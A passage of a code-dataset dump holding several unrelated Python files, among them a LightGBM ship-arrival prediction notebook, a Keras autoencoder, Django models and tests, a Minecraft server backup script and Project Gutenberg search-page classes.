enumerate(unique_set)}\n    for f in ['start_pot','end_pot']:\n        test_data[f]=test_data[f].map(unique_dict)\n        
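# use the same shared dictionary for train so port codes agree across both frames\n        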
train_data[f]=train_data[f].map(unique_dict)\n    return train_data,test_data\ndef get_label(df):\n    #tmp = df.groupby(['loadingOrder','vesselMMSI'])['timestamp'].agg({'time_max':'max'})\n    df['endtime'] = pd.to_datetime(df['endtime'], infer_datetime_format=True)\n    #df = df.merge(tmp,on=['loadingOrder','vesselMMSI'],how='left')\n    df['label'] = (df['endtime'] - df['timestamp']).dt.total_seconds()//3600\n    return df\n\n\n# In[39]:\n\n\ntrain = get_data(train,model='train')\ntrain = get_anchor(train)\ntrain = get_feature(train,model='train')\n#train = get_label(train)\ngc.collect()\n\n\n# ### Label construction\n\n# In[40]:\n\n\n# The round-A data already has an ETA, so the two parts must build their labels separately\ntrain_B = train[~train['loadingOrder'].isin(list(train1['loadingOrder'].value_counts().index))]\ntrain_A = train[train['loadingOrder'].isin(list(train1['loadingOrder'].value_counts().index))]\n\n\n# In[41]:\n\n\n# Labels for the round-A test set\ntrain1_label = train1_label[['loadingOrder','ETA']].drop_duplicates()\ntrain_A = train_A.merge(train1_label,on='loadingOrder',how='left')\ntrain_A['timestamp'] = pd.to_datetime(train_A['timestamp'], infer_datetime_format=True)\ntrain_A['ETA'] = pd.to_datetime(train_A['ETA'], infer_datetime_format=True)\ntrain_A['label'] = (train_A['ETA'] - train_A['timestamp']).dt.total_seconds()//3600\ndel train_A['ETA']\n\n\n# In[44]:\n\n\n# Labels for the round-B training data\ntrain= train_B\ntext = train.loc[abs(train['distanc2taget'])<=50]\nmerge_tabel = text[['loadingOrder','timestamp']].drop_duplicates(['loadingOrder'],keep='first').rename(columns={'timestamp':'endtime'})\ntrain = train.merge(merge_tabel,on=['loadingOrder'],how='left')\ndel merge_tabel\n#train = get_hot(train)\ntrain = get_label(train)\ngc.collect()\n\n\n# In[49]:\n\n\ntrain = train[train['label']>=0]\ndel train['endtime']\ntrain['timestamp'] = train['timestamp'].astype('str')\ntrain = reduce_mem(train)\ngc.collect()\n\n\n# In[50]:\n\n\ntrain_A['timestamp'] = train_A['timestamp'].astype('str')\ntrain = pd.concat([train,train_A],axis=0).reset_index(drop=True)\ndel train_A,train_B\ngc.collect()\n\n\n# In[53]:\n\n\n# Build the features for test\ntest = get_data(test,model='test')\ntest = get_anchor(test)\ntest = get_feature(test,model='test')\n#test = get_hot(test)\ngc.collect()\n\n\n# In[54]:\n\n\n# Label-encode the categorical columns\ntest1 = test.copy()\ntrain,test1 = type_encoding(train,test1)\ngc.collect()\n\n\n# ### Dataset construction and model training\n\n# In[ ]:\n\n\nfeatures = [c for c in train.columns if c in['carrierName', 'longitude', 'latitude', 'vesselMMSI', 'speed', 'direction', 'len', 'start_pot', 'end_pot', 'end_long', 'end_lat', 'start_long', 'start_lat', 'start_gap', 'end_gap', 'start_long_gap', 'start_lat_gap', 'end_long_gap', 'end_lat_gap', 'lat_diff','anchor','delay', 'lon_diff', 'speed_diff', 'direction_diff', 'diff_seconds', 'cusum_direction', 'cusum_speed', 'direction_valc', 'end_long_gap_1','all_gap','cusum_stop', 'end_lat_gap_1', 'start_long_gap_1', 'start_lat_gap_1', 'year','month','day', 'start_direction', 'have_run_time','all_start_ratio','all_end_ratio','stop']]#cumsum_stop\nprint(features)\nprint(len(features))\ngc.collect()\n\n\n# In[61]:\n\n\nfrom sklearn.metrics import mean_squared_error,explained_variance_score\nfrom sklearn.model_selection import KFold\nfrom lightgbm.sklearn import LGBMRegressor\ndef mse_score_eval(preds, valid):\n    labels = valid.get_label()\n    scores = mean_squared_error(y_true=labels, y_pred=preds)\n    return 'mse_score', scores, True\n\ndef build_model(train_data, test, pred, label, seed=2099, is_shuffle=True):\n    train_pred = np.zeros((train_data.shape[0], ))\n    test_pred = np.zeros((test.shape[0], ))\n    
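# train_pred collects out-of-fold predictions; test_pred accumulates the average over the folds\n    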
n_splits = 5\n    # K-fold split\n    fold = KFold(n_splits=n_splits, shuffle=is_shuffle, random_state=seed)\n    kf_way = fold.split(train_data[pred])\n    # params\n#     test_x=np.concatenate([test[pred].values,geohash_test],axis=1)\n    # train\n    for n_fold, (train_idx, valid_idx) in enumerate(kf_way, start=1):\n        train_x, train_y = train_data[pred].iloc[train_idx].values, train_data[label].iloc[train_idx]\n        valid_x, valid_y = train_data[pred].iloc[valid_idx].values, train_data[label].iloc[valid_idx]\n#         geohash_tr_x,geohash_val_x=geohash_train[train_idx],geohash_train[valid_idx]\n#         train_x=np.concatenate([train_x,geohash_tr_x],axis=1)\n#         valid_x=np.concatenate([valid_x,geohash_val_x],axis=1)\n\n        # Model setup\n        clf=LGBMRegressor(learning_rate=0.5,\n            n_estimators=6000,\n            boosting_type = 'gbdt',\n            objective = 'regression',\n            num_leaves=156,\n            subsample=0.8,\n            n_jobs=-1,\n            max_depth=6,\n            reg_lambda=0,\n            colsample_bytree=0.8,\n            random_state=2019,  # 2019\n            metric=['mse'])\n\n        clf.fit(\n            train_x, train_y,\n            eval_set=[(valid_x, valid_y)],\n            eval_metric=['mse'],\n            categorical_feature='auto',\n            early_stopping_rounds=100,\n            verbose=100)\n\n        train_pred[valid_idx] = clf.predict(valid_x, num_iteration=clf.best_iteration_)\n\n        test_pred += clf.predict(test[pred], num_iteration=clf.best_iteration_)/fold.n_splits\n\n    print('mean_squared_error:',mean_squared_error(train_data[label].values,train_pred))\n    test['label'] = test_pred\n    return test[['loadingOrder', 'label']],clf\n\n\ndef build_onetrain(train_data, test,pred= features,label= 'label',seed=1099,est=6000, is_shuffle=True):\n    train_x,train_y=train_data[features].values,train_data[label].values\n    clf=LGBMRegressor(learning_rate=0.01,\n        boosting_type = 'gbdt',\n        objective = 'regression',\n        n_estimators=est,\n        num_leaves=156,\n        subsample=0.8,\n        n_jobs=-1,\n        max_depth=8,\n        reg_lambda=0,\n        colsample_bytree=0.8,\n        random_state=2019,  # 2019\n        metric=['mse'])\n\n    clf.fit(\n        train_x, train_y,\n        eval_set=[(train_x, train_y)],\n        eval_metric=['mse'],\n        categorical_feature='auto',\n        verbose=100)\n\n    #train_pred= clf.predict(train_x, num_iteration=clf.best_iteration_)\n\n    test_pred= clf.predict(test[pred], num_iteration=clf.best_iteration_)\n\n    #print('mean_squared_error:',mean_squared_error(train_y,train_pred))\n    test['label'] = test_pred\n    return test[['loadingOrder', 'label']],clf\n#result,clf = build_model(train1, test1,pred= features,label= 'label', is_shuffle=True)\nresult,clf=build_onetrain(train, test1,pred= features,label= 'label',est=8000,is_shuffle=True)\n\n\n# ### Turn the predictions into predicted arrival times\n\n# In[ ]:\n\n\ntest4 = test1.copy()\n\n\n# In[64]:\n\n\n# Use the prediction from each order's last record\ntest4['onboardDate'] = pd.to_datetime(test4['onboardDate'])\ntest4['timestamp'] = pd.to_datetime(test4['timestamp'])\ntest4['timestamp'] = test4['timestamp'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\ntest4['timestamp'] = pd.to_datetime(test4['timestamp'])\ntest4['ETA']=(test4['timestamp']+test4['label'].apply(lambda x:pd.Timedelta(hours=x))).apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\ntest4 = test4.drop_duplicates('loadingOrder',keep='last')\ntest4['creatDate'] = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')\nresult1 = test4[['loadingOrder', 'timestamp', 'longitude', 'latitude', 'carrierName', 'vesselMMSI', 'onboardDate', 'ETA', 'creatDate']]\n\n\n# In[65]:\n\n\nresult3 = result1[['loadingOrder','ETA']].drop_duplicates('loadingOrder')\ntest3 = pd.read_csv('./data/Btest0711_ALL.csv')\ntest3 = test3.merge(result3,on='loadingOrder',how='left')\ntest3['creatDate'] = datetime.datetime.now().strftime('%Y/%m/%d 
%H:%M:%S')\nresult2 = test3[['loadingOrder', 'timestamp', 'longitude', 'latitude', 'carrierName', 'vesselMMSI', 'onboardDate', 'ETA', 'creatDate']]\n\n\n# In[71]:\n\n\n# Convert the date columns to a uniform string format\nresult2['onboardDate'] = pd.to_datetime(result2['onboardDate'])\nresult2['onboardDate'] = result2['onboardDate'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\nresult2['ETA'] = pd.to_datetime(result2['ETA'])\nresult2['ETA'] = result2['ETA'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\nresult2['creatDate'] = pd.to_datetime(result2['creatDate'])\nresult2['creatDate'] = result2['creatDate'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\n\n\n# In[ ]:\n\n\n# Save the final result\nresult2.to_csv('./result/A4.csv')\n","sub_path":"BDC2020无能万金油-复赛/model_A4.py","file_name":"model_A4.py","file_ext":"py","file_size_in_byte":37084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"38903230","text":"import itertools\n\nimport numpy as np\nimport tensorflow as tf\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras.datasets import mnist\nfrom keras.optimizers import Adam\nfrom keras.losses import mean_squared_error, categorical_crossentropy\nfrom keras.metrics import categorical_accuracy\n\ndef build_softmax_model():\n    inputs = Input(shape=(200,))\n    outputs = Dense(10, activation='softmax')(inputs)\n    model = Model(inputs, outputs)\n    return model\n\ndef build_ae_model():\n    inputs = Input(shape=(28*28,))\n\n    x_encoder = Dense(512, activation='relu', use_bias=True)(inputs)\n    x_encoder = Dense(200, activation='relu', use_bias=True)(x_encoder)\n    x_decoder = Dense(512, activation='relu', use_bias=True)(x_encoder)\n    x_decoder = Dense(28*28, activation='relu', use_bias=True)(x_decoder)\n    outputs = x_decoder\n\n    encoder = Model([inputs], [x_encoder])\n    decoder = None\n    ae_model = Model([inputs], [outputs])\n\n    x_softmax = Dense(10, activation='softmax')(x_encoder)\n    softmax_model = Model([inputs], [x_softmax])\n    return encoder, decoder, ae_model, softmax_model\n\ndef main():\n    (x_train, y_train), (x_test, y_test) = mnist.load_data()\n    x_train = np.reshape(x_train, (-1, 28*28*1))\n    x_test = np.reshape(x_test, (-1, 28*28*1))\n    x_train = x_train/255.0\n    x_test = x_test/255.0\n\n    # one-hot encode the labels\n    temp = np.zeros((y_train.shape[0],10))\n    for i in range(y_train.shape[0]):\n        temp[i, y_train[i]] = 1\n    y_train = temp\n\n    temp = np.zeros((y_test.shape[0],10))\n    for i in range(y_test.shape[0]):\n        temp[i, y_test[i]] = 1\n    y_test = temp\n\n    encoder, _, ae, _ = build_ae_model()  # build_ae_model is the builder defined above\n    ae.compile(optimizer=Adam(), loss=[mean_squared_error], metrics=[mean_squared_error])\n\n    classifier = build_softmax_model()\n    classifier.compile(optimizer=Adam(), loss=[categorical_crossentropy], metrics=[categorical_accuracy])\n\n    for i in range(100):\n        ae.fit(x_train, x_train, epochs=1, verbose=0)\n        x_decode_train = encoder.predict(x_train)\n        x_decode_test = encoder.predict(x_test)\n        classifier.fit(x_decode_train, y_train, epochs=1, verbose=0)\n        print(classifier.evaluate(x_decode_test, y_test, verbose=0))\n\nif __name__ == '__main__':\n    main()\n","sub_path":"ae_mnist.py","file_name":"ae_mnist.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"63357339","text":"from fvcore.common.registry import Registry\n\nLAYER_REGISTRY = Registry(\"LAYER_REGISTRY\")  # noqa F401 isort:skip\nLAYER_REGISTRY.__doc__ = \"\"\"\n\n\"\"\"\n\n\ndef build_layer(cfg, **kwargs):\n    \"\"\"\n    Build a single layer from ``LAYER_REGISTRY``, keyed by the 
layer name in ``cfg.name``.\n    Note that it does not load any weights from ``cfg``.\n    \"\"\"\n    return LAYER_REGISTRY.get(cfg.name)(cfg=cfg, **kwargs)\n","sub_path":"exp/comm/layers/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"151905656","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Using asyncio in Python 3.5\n\nimport sys\nimport asyncio\n\n\nfrom time import time\nfrom fib import log_fib\n\n\n\ndef process_input():\n    text = sys.stdin.readline()\n    n = int(text)\n    print(\"Fib({}) = {}\".format(n, log_fib(n)))\n\nasync def print_hello():\n    while True:\n        print(\"{} - Async Hello\".format(int(time())))\n        await asyncio.sleep(3)\n\n\ndef main():\n    loop = asyncio.get_event_loop()\n    loop.add_reader(sys.stdin, process_input)\n    loop.run_until_complete(print_hello())\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"languages/tips/understand_asyncio/example_6.py","file_name":"example_6.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"627149354","text":"from django.db import models\nfrom datetime import datetime\n\nclass Event(models.Model):\n    name = models.CharField(max_length=256)\n    start_date = models.DateField(null=True, verbose_name='Date to start display')\n    end_date = models.DateField(null=True, verbose_name='Date to end display')\n    event_start_date = models.DateTimeField(null=True)\n    event_end_date = models.DateTimeField(null=True)\n    teaser = models.CharField(max_length=1024, null=True, blank=True)\n    content = models.TextField(null=True)\n\n    def save(self, *args, **kwargs):\n        if not self.start_date:\n            self.start_date = datetime.now()\n        super(Event, self).save(*args, **kwargs)\n\n    def get_date_string(self):\n        # e.g. Saturday, December 11th, 2011 from 2 to 6 pm\n        start_date = self.event_start_date\n        end_date = self.event_end_date\n        if not start_date:\n            return ''\n\n        ds = start_date.day\n        if ds % 100 in (11, 12, 13):  # 11th, 12th and 13th are exceptions to the st/nd/rd rule\n            ds = \"%dth\" % ds\n        elif ds%10 == 1:\n            ds = \"%dst\" % ds\n        elif ds%10 == 2:\n            ds = \"%dnd\" % ds\n        elif ds%10 == 3:\n            ds = \"%drd\" % ds\n        else:\n            ds = \"%dth\" % ds\n\n        if start_date.year == end_date.year and start_date.month == end_date.month and start_date.day == end_date.day:\n            # Same day\n            ds = start_date.strftime('%A, %B') + (\" %s, \" % ds) + start_date.strftime('%Y') + \" from\"\n            if start_date.strftime('%p') == end_date.strftime('%p'):\n                ds = \"%s %d to %d %s\" % (ds, int(start_date.strftime('%I')), int(end_date.strftime('%I')), start_date.strftime('%p'))\n            else:\n                ds = \"%s %d %s to %d %s\" % (ds, int(start_date.strftime('%I')), start_date.strftime('%p'), int(end_date.strftime('%I')), end_date.strftime('%p'))\n        else:\n            ds = start_date.strftime('%A, %B') + \" until \" + end_date.strftime('%A, %B')\n        return ds\n\n    date_string = property(get_date_string)\n","sub_path":"apps/event/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"156563063","text":"import json\n\nfrom django.test import Client\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom base.models.evaluation import Evaluation\n\n\nclass TestPokemonApi(APITestCase):\n    url = reverse('evaluation_detail')\n\n    def test_fair_trade(self):\n        \"\"\"Evaluate two lists of my and their pokemon\"\"\"\n        data = {\n            \"my\": [{\"name\": \"Ninetales\"}, {\"name\": 
\"ninetales\"}],\n \"their\": [{\"name\": \"ninetales\"}, {\"name\": \"nineTales\"}]\n }\n response = Client().post(self.url, json.dumps(data), content_type='application/json')\n self.assertEqual(200, response.status_code)\n self.assertEqual(True, response.data.get('good_trade'))\n self.assertEqual(354, response.data.get('my_total_base_experience'))\n self.assertEqual(354, response.data.get('their_total_base_experience'))\n\n def test_fair_trade_with_unknown_pokemon(self):\n data = {\n \"my\": [{\"name\": \"ablubleble\"}, {\"name\": \"ninetales\"}],\n \"their\": [{\"name\": \"ninetales\"}, {\"name\": \"nineTales\"}]\n }\n response = Client().post(self.url, json.dumps(data), content_type='application/json')\n self.assertEqual(404, response.status_code)\n\n def test_sum_base_experience(self):\n lista = [{\"name\": \"Ninetales\"}, {\"name\": \"ninetales\"}]\n sum, objs = Evaluation().sum_base_experience(lista)\n self.assertEqual(354, sum)\n self.assertEqual(len(lista), len(objs))\n\n def test_evaluate_by_base_experience(self):\n result = Evaluation().evaluate_by_base_experience(354, 354)\n self.assertEqual(True, result)\n\n def test_evaluate_by_bad_base_experience(self):\n result = Evaluation().evaluate_by_base_experience(354, 297)\n self.assertEqual(False, result)\n","sub_path":"api/base/tests/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"214959943","text":"#!/bin/python3\nimport os, sys, time\nimport shutil\nimport threading\nimport urllib.request\nfrom zipfile import *\n\nfrom config import *\n\ndef backup():\n bkp_dir_tmp = \"%s/%s\" % (bkp_path, time.strftime(\"%Y-%m-%d\"))\n try:\n os.stat(bkp_dir_tmp)\n except:\n os.mkdir(bkp_dir_tmp)\n zf = ZipFile(\"%s/%s.zip\" % (bkp_dir_tmp, time.strftime(\"%H-%M-%S\")), \"w\", compression=ZIP_LZMA)\n for dirname, subdirs, files in os.walk(\"./%s\" % world):\n zf.write(dirname)\n for filename in files:\n zf.write(os.path.join(dirname, filename))\n zf.close()\n\ndef clean_old():\n for subdir, dirs, files in os.walk(bkp_path):\n iterator = 0\n for directory in sorted(dirs):\n if iterator >= len(dirs) - bkp_keep:\n break\n shutil.rmtree(\"%s/%s\" % (bkp_path, directory))\n iterator += 1\n break\n\ndef update_server():\n filelist = [ f for f in os.listdir(\".\") if f.endswith(\".jar\") ]\n for f in filelist:\n os.remove(f)\n urllib.request.urlretrieve(dl_link, srv_file)\n print(\"Updated server to %s.\" % mc_ver)\n\ndef backup_thread():\n if backup:\n while True:\n backup()\n if bkp_keep != 0:\n clean_old()\n time.sleep(3600 * bkp_interval)\n\ndef server_thread():\n os.system(\"java -jar %s --nogui\" % srv_file)\n\nbackup_thread_v = threading.Thread(target=backup_thread)\nbackup_thread_v.setDaemon(True)\n\nthreads = [backup_thread_v]\nif __name__ == \"__main__\":\n if not os.path.exists(srv_file):\n update_server()\n if (not os.path.exists('eula.txt')) and eula_accept:\n eula=open('eula.txt','w')\n eula.write(\"eula=true\")\n eula.close()\n\n backup_thread_v.start()\n server_thread()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"275518509","text":"#!/usr/bin/env python\n# -*- mode: python; indent-tabs-mode: nil; -*- coding: utf-8 -*-\n\n\"\"\"\nSearchPage.py\n\nCopyright 2009-2012 by Marcello Perathoner\n\nDistributable under the GNU General Public 
License Version 3 or newer.\n\nThe various flavors of search page.\n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport cherrypy\n\nfrom libgutenberg.MediaTypes import mediatypes as mt\nfrom libgutenberg.DublinCore import DublinCore\n\nimport BaseSearcher\nfrom Page import SearchPage\n\n\nclass BookSearchPage (SearchPage):\n \"\"\" search term => list of books \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'release_date', 'title', 'random')\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n\n if os.sort_order == 'random':\n sql.where.append (\"\"\"\n pk in (select floor (random () * maxbook)::integer\n from generate_series (1, 30), (select max (pk) as maxbook\n from books) xbks1)\n \"\"\")\n\n if len (os.query):\n sql.fulltext ('books.tsvec', os.query)\n os.title = _(\"Books: {title}\").format (title = os.query)\n else:\n os.title = _('All Books')\n\n\n def fixup (self, os):\n \"\"\" strip marc subfields, add social media hints and facet links \"\"\"\n\n for e in os.entries:\n if '$' in e.title:\n e.title = DublinCore.strip_marc_subfields (e.title)\n\n if (os.sort_order == 'release_date' and os.total_results > 0 and os.start_index == 1):\n cat = BaseSearcher.Cat ()\n cat.title = _('Follow new books on Twitter')\n cat.subtitle = _(\"Follow our new books on Twitter.\")\n cat.url = 'https://twitter.com/gutenberg_new'\n cat.class_ += 'navlink grayed'\n cat.icon = 'twitter'\n cat.order = 5\n os.entries.insert (0, cat)\n\n cat = BaseSearcher.Cat ()\n cat.title = _('Follow new books on Facebook')\n cat.subtitle = _(\"Follow the link and like the page to have us post new books to your wall.\")\n cat.url = 'https://www.facebook.com/gutenberg.new'\n cat.class_ += 'navlink grayed'\n cat.icon = 'facebook'\n cat.order = 5\n os.entries.insert (0, cat)\n\n if (len (os.query) and os.start_index == 1):\n sql2 = BaseSearcher.SQLStatement ()\n sql2.query = \"select count (*) from bookshelves\"\n sql2.fulltext ('bookshelves.tsvec', os.query)\n rows = BaseSearcher.SQLSearcher.execute (*sql2.build ())\n if rows[0][0] > 0:\n cat = BaseSearcher.Cat ()\n cat.rel = 'related'\n cat.title = _('Bookshelves')\n cat.subtitle = __('One bookshelf matches your query.',\n '{count} bookshelves match your search.',\n rows[0][0]).format (count = rows[0][0])\n cat.url = os.url ('bookshelf_search', query = os.query)\n cat.class_ += 'navlink grayed'\n cat.icon = 'bookshelf'\n cat.order = 3\n os.entries.insert (0, cat)\n\n sql2 = BaseSearcher.SQLStatement ()\n sql2.query = \"select count (*) from subjects\"\n sql2.fulltext ('subjects.tsvec', os.query)\n rows = BaseSearcher.SQLSearcher.execute (*sql2.build ())\n if rows[0][0] > 0:\n cat = BaseSearcher.Cat ()\n cat.rel = 'related'\n cat.title = _('Subjects')\n cat.subtitle = __('One subject heading matches your search.',\n '{count} subject headings match your search.',\n rows[0][0]).format (count = rows[0][0])\n cat.url = os.url ('subject_search', query = os.query)\n cat.class_ += 'navlink grayed'\n cat.icon = 'subject'\n cat.order = 3\n os.entries.insert (0, cat)\n\n sql2 = BaseSearcher.SQLStatement ()\n sql2.query = \"select count (*) from authors\"\n sql2.fulltext ('authors.tsvec', os.query)\n rows = BaseSearcher.SQLSearcher.execute (*sql2.build ())\n if rows[0][0] > 0:\n cat = BaseSearcher.Cat ()\n cat.rel = 'related'\n cat.title = _('Authors')\n cat.subtitle = __('One author name matches your search.',\n '{count} author names match your search.',\n rows[0][0]).format (count = rows[0][0])\n cat.url = os.url 
('author_search', query = os.query)\n cat.class_ += 'navlink grayed'\n cat.icon = 'author'\n cat.order = 3\n os.entries.insert (0, cat)\n\n\nclass AuthorSearchPage (SearchPage):\n \"\"\" name => list of authors \"\"\"\n\n def setup (self, os, sql):\n os.f_format_subtitle = os.format_subtitle\n os.f_format_url = BaseSearcher.SearchUrlFormatter ('author')\n os.f_format_thumb_url = os.format_none\n os.sort_orders = ('downloads', 'quantity', 'alpha', 'release_date')\n os.icon = 'author'\n os.class_ += 'navlink'\n os.title = _('All Authors')\n\n sql.query = \"\"\"\n SELECT\n authors.author as title,\n coalesce (authors.born_floor || '', '') || '-' ||\n coalesce (authors.died_floor || '', '') as subtitle,\n authors.pk as pk,\n max (books.release_date) as release_date,\n sum (books.downloads) as downloads,\n count (books.pk) as quantity\"\"\"\n\n sql.from_ = ('authors', 'mn_books_authors as mn', 'books')\n sql.groupby += ('authors.author', 'subtitle', 'authors.pk')\n sql.where.append ('authors.pk = mn.fk_authors')\n sql.where.append ('books.pk = mn.fk_books')\n\n if len (os.query):\n sql.fulltext ('authors.tsvec', os.query)\n os.title = _(\"Authors: {author}\").format (author = os.query)\n else:\n sql.where.append (\"authors.author not in ('Various', 'Anonymous', 'Unknown')\")\n\n\nclass SubjectSearchPage (SearchPage):\n \"\"\" term => list of subects \"\"\"\n\n def setup (self, os, sql):\n os.f_format_url = BaseSearcher.SearchUrlFormatter ('subject')\n os.f_format_thumb_url = os.format_none\n os.sort_orders = ('downloads', 'quantity', 'alpha', 'release_date')\n os.icon = 'subject'\n os.class_ += 'navlink'\n os.title = _('All Subjects')\n\n sql.query = \"\"\"\n SELECT\n subjects.subject as title,\n subjects.pk as pk,\n max (books.release_date) as release_date,\n sum (books.downloads) as downloads,\n count (books.pk) as quantity\"\"\"\n\n sql.from_ = ('subjects', 'mn_books_subjects as mn', 'books')\n sql.groupby += ('subjects.subject', 'subjects.pk')\n sql.where.append ('subjects.pk = mn.fk_subjects')\n sql.where.append ('books.pk = mn.fk_books')\n\n if len (os.query):\n sql.fulltext ('subjects.tsvec', os.query)\n os.title = _(\"Subjects: {subject}\").format (subject = os.query)\n\n\nclass BookshelfSearchPage (SearchPage):\n \"\"\" term => list of bookshelves \"\"\"\n\n def setup (self, os, sql):\n os.f_format_url = BaseSearcher.SearchUrlFormatter ('bookshelf')\n os.f_format_thumb_url = os.format_none\n os.sort_orders = ('downloads', 'quantity', 'alpha', 'release_date')\n os.icon = 'bookshelf'\n os.class_ += 'navlink'\n os.title = _('All Bookshelves')\n\n sql.query = \"\"\"\n SELECT\n bookshelves.bookshelf as title,\n bookshelves.pk as pk,\n max (books.release_date) as release_date,\n sum (books.downloads) as downloads,\n count (books.pk) as quantity\"\"\"\n\n sql.from_ = ('bookshelves', 'mn_books_bookshelves as mn', 'books')\n sql.groupby += ('bookshelves.bookshelf', 'bookshelves.pk')\n sql.where.append ('bookshelves.pk = mn.fk_bookshelves')\n sql.where.append ('books.pk = mn.fk_books')\n\n if len (os.query):\n sql.fulltext ('bookshelves.tsvec', os.query)\n os.title = _(\"Bookshelves: {bookshelf}\").format (bookshelf = os.query)\n\n\nclass AuthorPage (SearchPage):\n \"\"\" author id => books by author \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'title', 'release_date')\n os.title_icon = 'author'\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.author = BaseSearcher.sql_get (\n \"select author from authors where pk = %(pk)s\", 
pk = os.id)\n os.title = _('Books by {author}').format (author = os.author)\n\n sql.from_.append ('mn_books_authors as mn')\n sql.where.append ('books.pk = mn.fk_books')\n sql.where.append (\"mn.fk_authors = %(fk_authors)s\")\n sql.params['fk_authors'] = os.id\n\n def fixup (self, os):\n\n if (os.start_index == 1 and len (os.entries) > 1):\n\n # browse-by-author page for maintainers\n if 'is-catalog-maintainer' in cherrypy.request.cookie:\n cat = BaseSearcher.Cat ()\n cat.type = mt.html\n cat.rel = 'related'\n cat.title = _('Browse by Author')\n cat.url = \"/browse/authors/%s#a%d\" % (os.author[:1].lower (), os.id)\n cat.class_ += 'navlink grayed'\n cat.icon = 'internal'\n cat.order = 9\n os.entries.insert (0, cat)\n\n # wikipedia links etc.\n rows = BaseSearcher.SQLSearcher.execute (\n \"\"\"SELECT url, description AS title FROM author_urls\n WHERE fk_authors = %(fk_authors)s\"\"\",\n { 'fk_authors': os.id } )\n for row in rows:\n cat = BaseSearcher.Cat ()\n cat.type = mt.html\n cat.rel = 'related'\n cat.title = _('See also: {title}').format (title = row.title)\n cat.url = row.url\n cat.class_ += 'navlink grayed'\n cat.icon = 'external'\n cat.order = 8\n os.entries.insert (0, cat)\n\n # author aliases\n if os.format in ('html', 'mobile'):\n rows = BaseSearcher.SQLSearcher.execute (\n \"\"\"SELECT alias AS title FROM aliases\n WHERE fk_authors = %(fk_authors)s AND alias_heading = 1\"\"\",\n { 'fk_authors': os.id }\n )\n\n for row in rows:\n cat = BaseSearcher.Cat ()\n cat.title = _('Alias {alias}').format (alias = row.title)\n cat.class_ += 'grayed'\n cat.icon = 'alias'\n cat.order = 7\n os.entries.insert (0, cat)\n\n\nclass SubjectPage (SearchPage):\n \"\"\" subject id => books about subject \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'title', 'release_date')\n os.title_icon = 'subject'\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.subject = BaseSearcher.sql_get (\n \"select subject from subjects where pk = %(pk)s\", pk = os.id)\n os.title = _('Books about {subject}').format (subject = os.subject)\n\n sql.from_.append ('mn_books_subjects as mn')\n sql.where.append ('books.pk = mn.fk_books')\n sql.where.append (\"mn.fk_subjects = %(fk_subjects)s\")\n sql.params['fk_subjects'] = os.id\n\n\nclass BookshelfPage (SearchPage):\n \"\"\" bookshelf id => books on bookshelf \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', 'title', 'release_date')\n os.title_icon = 'bookshelf'\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.bookshelf = BaseSearcher.sql_get (\n \"select bookshelf from bookshelves where pk = %(pk)s\", pk = os.id)\n os.title = _('Books in {bookshelf}').format (bookshelf = os.bookshelf)\n\n sql.from_.append ('mn_books_bookshelves as mn')\n sql.where.append ('books.pk = mn.fk_books')\n sql.where.append (\"mn.fk_bookshelves = %(fk_bookshelves)s\")\n sql.params['fk_bookshelves'] = os.id\n\n\nclass AlsoDownloadedPage (SearchPage):\n \"\"\" ebook id => books people also downloaded \"\"\"\n\n def setup (self, os, sql):\n os.sort_orders = ('downloads', )\n os.icon = 'book'\n os.class_ += 'booklink'\n os.f_format_icon = os.format_icon_titles\n os.title = _('Readers also downloaded')\n\n sql.query = \"\"\"\n SELECT\n books.pk,\n books.title,\n books.filing,\n books.author,\n books.release_date,\n books.fk_categories,\n books.fk_langs,\n books.coverpages,\n d.dl as downloads\n FROM\n v_appserver_books_4 as books\n JOIN (\n SELECT\n s1.fk_books as pk, count 
